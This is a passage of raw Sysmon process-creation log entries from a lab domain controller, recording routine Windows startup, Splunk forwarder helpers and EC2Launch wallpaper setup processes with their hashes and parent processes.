Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{A8622C2F-3E7B-6078-AB00-00000000AE01}1340C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000015757Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:39:35.193{A8622C2F-4217-6078-9C04-00000000AE01}6720C:\Windows\SysWOW64\dllhost.exe10.0.14393.0 (rs1_release.160715-1616)COM SurrogateMicrosoft® Windows® Operating SystemMicrosoft Corporationdllhost.exeC:\Windows\SysWOW64\DllHost.exe /Processid:{06622D85-6856-4460-8DE1-A81921B41C4B}C:\Windows\system32\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=6046950FC9CA5B7A7E084C189658DACB,SHA256=5137C324038AB2E8EAB4F98A20BEE9F121346D62E4D907CA1E4A860F4C54EAE8,IMPHASH=EC90A0D780E0DD23BA7910ABD6BF7E32{A8622C2F-3DED-6078-0C00-00000000AE01}592C:\Windows\System32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch 154100x800000000000000015662Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:39:26.271{A8622C2F-420E-6078-8904-00000000AE01}7092C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{A8622C2F-3E7B-6078-AB00-00000000AE01}1340C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000015636Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:39:25.005{A8622C2F-420D-6078-8604-00000000AE01}6744C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{A8622C2F-3E7B-6078-AB00-00000000AE01}1340C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000015608Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:39:24.333{A8622C2F-420C-6078-8104-00000000AE01}7156C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-3E7B-6078-AB00-00000000AE01}1340C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000015584Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:39:23.520{A8622C2F-420B-6078-7D04-00000000AE01}6800C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-3E7B-6078-AB00-00000000AE01}1340C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000015559Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:39:22.600{A8622C2F-420A-6078-7904-00000000AE01}3216C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{A8622C2F-3E7B-6078-AB00-00000000AE01}1340C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000015544Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:39:21.911{A8622C2F-4209-6078-7704-00000000AE01}3068C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{A8622C2F-3E7B-6078-AB00-00000000AE01}1340C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000015514Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:39:21.099{A8622C2F-4209-6078-7104-00000000AE01}5304C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{A8622C2F-3E7B-6078-AB00-00000000AE01}1340C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000015244Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:38:57.838{A8622C2F-41F1-6078-3F04-00000000AE01}6976C:\Windows\System32\findstr.exe10.0.14393.0 (rs1_release.160715-1616)Find String (QGREP) UtilityMicrosoft® Windows® Operating SystemMicrosoft CorporationFINDSTR.EXEfindstr /v DELETEME C:\Windows\system32\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=15B171EC73E7B71F4EBB4247E716271E,SHA256=2956F7BC863498DFCC868CE7DF4C9C131A4A5C17B065658456AFEF7566ACE1EE,IMPHASH=D7962312082AAB17974D6817E09E5D7A{A8622C2F-41EC-6078-3904-00000000AE01}7104C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\RunWallpaperSetupInit.cmd" " 154100x800000000000000015234Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:38:57.805{A8622C2F-41F1-6078-3E04-00000000AE01}6860C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /S /D /c" type "C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\RunWallpaperSetupInit.cmd" "C:\Windows\system32\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{A8622C2F-41EC-6078-3904-00000000AE01}7104C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\RunWallpaperSetupInit.cmd" " 154100x800000000000000015203Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:38:55.477{A8622C2F-41EF-6078-3D04-00000000AE01}6668C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe14.10.25028.0 built by: VCTOOLSD15RTMMicrosoft® Resource File To COFF Object Conversion UtilityMicrosoft® .NET FrameworkMicrosoft CorporationCVTRES.EXEC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\ADMINI~1\AppData\Local\Temp\RESC6B2.tmp" "c:\Users\Administrator\AppData\Local\Temp\lyei3dhy\CSC6B06D1F9D9D54B0F966DC4AE4AD0F469.TMP"C:\Windows\system32\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=C877CBB966EA5939AA2A17B6A5160950,SHA256=1FE531EAC592B480AA4BD16052B909C3431434F17E7AE163D248355558CE43A6,IMPHASH=55D76ADE7FFEA0F41FF2B55505C2B362{A8622C2F-41EF-6078-3C04-00000000AE01}6684C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Administrator\AppData\Local\Temp\lyei3dhy\lyei3dhy.cmdline" 154100x800000000000000015192Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:38:55.157{A8622C2F-41EF-6078-3C04-00000000AE01}6684C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe4.8.3761.0 built by: NET48REL1Visual C# Command Line CompilerMicrosoft® .NET FrameworkMicrosoft Corporationcsc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Administrator\AppData\Local\Temp\lyei3dhy\lyei3dhy.cmdline"C:\Windows\system32\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=23EE3D381CFE3B9F6229483E2CE2F9E1,SHA256=4240A12E0B246C9D69AF1F697488FE7DA1B497DF20F4A6F95135B4D5FE180A57,IMPHASH=EE1E569AD02AA1F7AECA80AC0601D80D{A8622C2F-41EC-6078-3B04-00000000AE01}7056C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -NonInteractive -NoLogo -WindowStyle hidden -ExecutionPolicy Unrestricted "Import-Module "C:\ProgramData\Amazon\EC2-Windows\Launch\Module\Ec2Launch.psd1"; Set-Wallpaper -Initial" 154100x800000000000000015137Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:38:52.426{A8622C2F-41EC-6078-3B04-00000000AE01}7056C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -NonInteractive -NoLogo -WindowStyle hidden -ExecutionPolicy Unrestricted "Import-Module "C:\ProgramData\Amazon\EC2-Windows\Launch\Module\Ec2Launch.psd1"; Set-Wallpaper -Initial" C:\Windows\system32\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{A8622C2F-41EC-6078-3904-00000000AE01}7104C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\RunWallpaperSetupInit.cmd" " 154100x800000000000000015113Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:38:52.362{A8622C2F-41EC-6078-3904-00000000AE01}7104C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c ""C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\RunWallpaperSetupInit.cmd" "C:\Windows\system32\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{A8622C2F-41CC-6078-CC03-00000000AE01}5260C:\Windows\explorer.exeC:\Windows\Explorer.EXE /NOUACCHECK 154100x800000000000000012959Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:38:34.934{A8622C2F-41DA-6078-1804-00000000AE01}5712C:\Windows\System32\rundll32.exe10.0.14393.4169 (rs1_release.210107-1130)Windows host process (Rundll32)Microsoft® Windows® Operating SystemMicrosoft CorporationRUNDLL32.EXE"C:\Windows\System32\rundll32.exe" "C:\Windows\System32\iesetup.dll",IEHardenUserC:\Windows\system32\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=23DB802097F7B7E520E40068A7E68B14,SHA256=28DE7D3E8BF4B19E44063A4BFC2E7C30AE488CD9A1F63320ED374E14AAECA667,IMPHASH=7D1CE1BAFE48B63D9D19E8E0E5DF3E6C{A8622C2F-41CC-6078-CC03-00000000AE01}5260C:\Windows\explorer.exeC:\Windows\Explorer.EXE /NOUACCHECK 154100x800000000000000012932Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:38:33.732{A8622C2F-41D9-6078-1704-00000000AE01}3684C:\Windows\System32\rundll32.exe10.0.14393.4169 (rs1_release.210107-1130)Windows host process (Rundll32)Microsoft® Windows® Operating SystemMicrosoft CorporationRUNDLL32.EXE"C:\Windows\System32\rundll32.exe" "C:\Windows\System32\iesetup.dll",IEHardenAdminC:\Windows\system32\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=23DB802097F7B7E520E40068A7E68B14,SHA256=28DE7D3E8BF4B19E44063A4BFC2E7C30AE488CD9A1F63320ED374E14AAECA667,IMPHASH=7D1CE1BAFE48B63D9D19E8E0E5DF3E6C{A8622C2F-41CC-6078-CC03-00000000AE01}5260C:\Windows\explorer.exeC:\Windows\Explorer.EXE /NOUACCHECK 154100x800000000000000012852Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:38:30.987{A8622C2F-41D6-6078-0C04-00000000AE01}5908C:\Windows\System32\unregmp2.exe12.0.14393.4169 (rs1_release.210107-1130)Microsoft Windows Media Player Setup UtilityMicrosoft® Windows® Operating SystemMicrosoft Corporationunregmp2.exe"C:\Windows\System32\unregmp2.exe" /FirstLogonC:\Windows\system32\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=0AFAF8B10C3D2B009DED280C875EA3EA,SHA256=CFC5A8170AF2CCB8F846BA738E5173596A4C35C023BCE5E6EB04E07779283188,IMPHASH=DFC94E57160B0CE8835243B5D92F3D9E{A8622C2F-41CC-6078-CC03-00000000AE01}5260C:\Windows\explorer.exeC:\Windows\Explorer.EXE /NOUACCHECK 154100x800000000000000012727Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:38:27.605{A8622C2F-41D3-6078-F803-00000000AE01}5760C:\Windows\System32\rundll32.exe10.0.14393.4169 (rs1_release.210107-1130)Windows host process (Rundll32)Microsoft® Windows® Operating SystemMicrosoft CorporationRUNDLL32.EXEC:\Windows\system32\RunDll32.exe C:\Windows\system32\migration\WininetPlugin.dll,MigrateCacheForUser /m /0C:\Windows\system32\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92MediumMD5=23DB802097F7B7E520E40068A7E68B14,SHA256=28DE7D3E8BF4B19E44063A4BFC2E7C30AE488CD9A1F63320ED374E14AAECA667,IMPHASH=7D1CE1BAFE48B63D9D19E8E0E5DF3E6C{A8622C2F-41D3-6078-F003-00000000AE01}5228C:\Windows\System32\ie4uinit.exeC:\Windows\System32\ie4uinit.exe -ClearIconCache 154100x800000000000000012720Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:38:27.603{A8622C2F-41D3-6078-F703-00000000AE01}5780C:\Windows\System32\rundll32.exe10.0.14393.4169 (rs1_release.210107-1130)Windows host process (Rundll32)Microsoft® Windows® Operating SystemMicrosoft CorporationRUNDLL32.EXEC:\Windows\system32\RunDll32.exe C:\Windows\system32\migration\WininetPlugin.dll,MigrateCacheForUser /m /0C:\Windows\system32\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92LowMD5=23DB802097F7B7E520E40068A7E68B14,SHA256=28DE7D3E8BF4B19E44063A4BFC2E7C30AE488CD9A1F63320ED374E14AAECA667,IMPHASH=7D1CE1BAFE48B63D9D19E8E0E5DF3E6C{A8622C2F-41D3-6078-F003-00000000AE01}5228C:\Windows\System32\ie4uinit.exeC:\Windows\System32\ie4uinit.exe -ClearIconCache 154100x800000000000000012688Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:38:27.087{A8622C2F-41D3-6078-F003-00000000AE01}5228C:\Windows\System32\ie4uinit.exe11.00.14393.2999 (rs1_release_inmarket.190520-1518)IE Per-User Initialization UtilityInternet ExplorerMicrosoft CorporationIE4UINIT.EXEC:\Windows\System32\ie4uinit.exe -ClearIconCacheC:\Windows\system32\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=8450580ADC40581006B7233F2B2803EB,SHA256=DD7FE0DBD6BD3B66437C093B707D1B2CA8AC72E4671B88829A4327FA6B8A00BD,IMPHASH=A9F54FA8B3C0ECA158788E684C66CA9A{A8622C2F-41D2-6078-E803-00000000AE01}5884C:\Windows\System32\ie4uinit.exe"C:\Windows\System32\ie4uinit.exe" -UserConfig 154100x800000000000000012434Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:38:26.274{A8622C2F-41D2-6078-EB03-00000000AE01}6060C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{A8622C2F-3E7B-6078-AB00-00000000AE01}1340C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000012277Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:38:26.039{A8622C2F-41D2-6078-E803-00000000AE01}5884C:\Windows\System32\ie4uinit.exe11.00.14393.2999 (rs1_release_inmarket.190520-1518)IE Per-User Initialization UtilityInternet ExplorerMicrosoft CorporationIE4UINIT.EXE"C:\Windows\System32\ie4uinit.exe" -UserConfigC:\Windows\system32\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=8450580ADC40581006B7233F2B2803EB,SHA256=DD7FE0DBD6BD3B66437C093B707D1B2CA8AC72E4671B88829A4327FA6B8A00BD,IMPHASH=A9F54FA8B3C0ECA158788E684C66CA9A{A8622C2F-41CC-6078-CC03-00000000AE01}5260C:\Windows\explorer.exeC:\Windows\Explorer.EXE /NOUACCHECK 154100x800000000000000011981Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:38:25.021{A8622C2F-41D1-6078-E203-00000000AE01}5436C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{A8622C2F-3E7B-6078-AB00-00000000AE01}1340C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000011831Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:38:24.351{A8622C2F-41D0-6078-E103-00000000AE01}5304C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-3E7B-6078-AB00-00000000AE01}1340C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000011765Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:38:24.290{A8622C2F-41D0-6078-E003-00000000AE01}5192C:\Windows\System32\rundll32.exe10.0.14393.4169 (rs1_release.210107-1130)Windows host process (Rundll32)Microsoft® Windows® Operating SystemMicrosoft CorporationRUNDLL32.EXErundll32.exe AppXDeploymentExtensions.OneCore.dll,ShellRefreshC:\Windows\system32\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=23DB802097F7B7E520E40068A7E68B14,SHA256=28DE7D3E8BF4B19E44063A4BFC2E7C30AE488CD9A1F63320ED374E14AAECA667,IMPHASH=7D1CE1BAFE48B63D9D19E8E0E5DF3E6C{A8622C2F-41CD-6078-D003-00000000AE01}5464C:\Windows\System32\svchost.exeC:\Windows\system32\svchost.exe -k wsappx 154100x800000000000000011670Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:38:23.663{A8622C2F-41CF-6078-DB03-00000000AE01}6048C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-3E7B-6078-AB00-00000000AE01}1340C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000011567Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:38:22.678{A8622C2F-41CE-6078-D203-00000000AE01}5636C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{A8622C2F-3E7B-6078-AB00-00000000AE01}1340C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000011544Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:38:21.990{A8622C2F-41CD-6078-D103-00000000AE01}5528C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{A8622C2F-3E7B-6078-AB00-00000000AE01}1340C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000011501Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:38:21.589{A8622C2F-41CD-6078-CF03-00000000AE01}5392C:\Windows\System32\svchost.exe10.0.14393.0 (rs1_release.160715-1616)Host Process for Windows ServicesMicrosoft® Windows® Operating SystemMicrosoft Corporationsvchost.exeC:\Windows\System32\svchost.exe -k AppReadinessC:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=36F670D89040709013F6A460176767EC,SHA256=438B6CCD84F4DD32D9684ED7D58FD7D1E5A75FE3F3D12AB6C788E6BB0FFAD5E7,IMPHASH=2CED93915677390B76EE1916B92F3EF6{A8622C2F-3DEC-6078-0A00-00000000AE01}832C:\Windows\System32\services.exeC:\Windows\system32\services.exe 154100x800000000000000011465Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:38:21.100{A8622C2F-41CD-6078-CD03-00000000AE01}5288C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{A8622C2F-3E7B-6078-AB00-00000000AE01}1340C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000011431Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:38:20.473{A8622C2F-41CC-6078-C903-00000000AE01}3068C:\Windows\explorer.exe10.0.14393.4169 (rs1_release.210107-1130)Windows ExplorerMicrosoft® Windows® Operating SystemMicrosoft 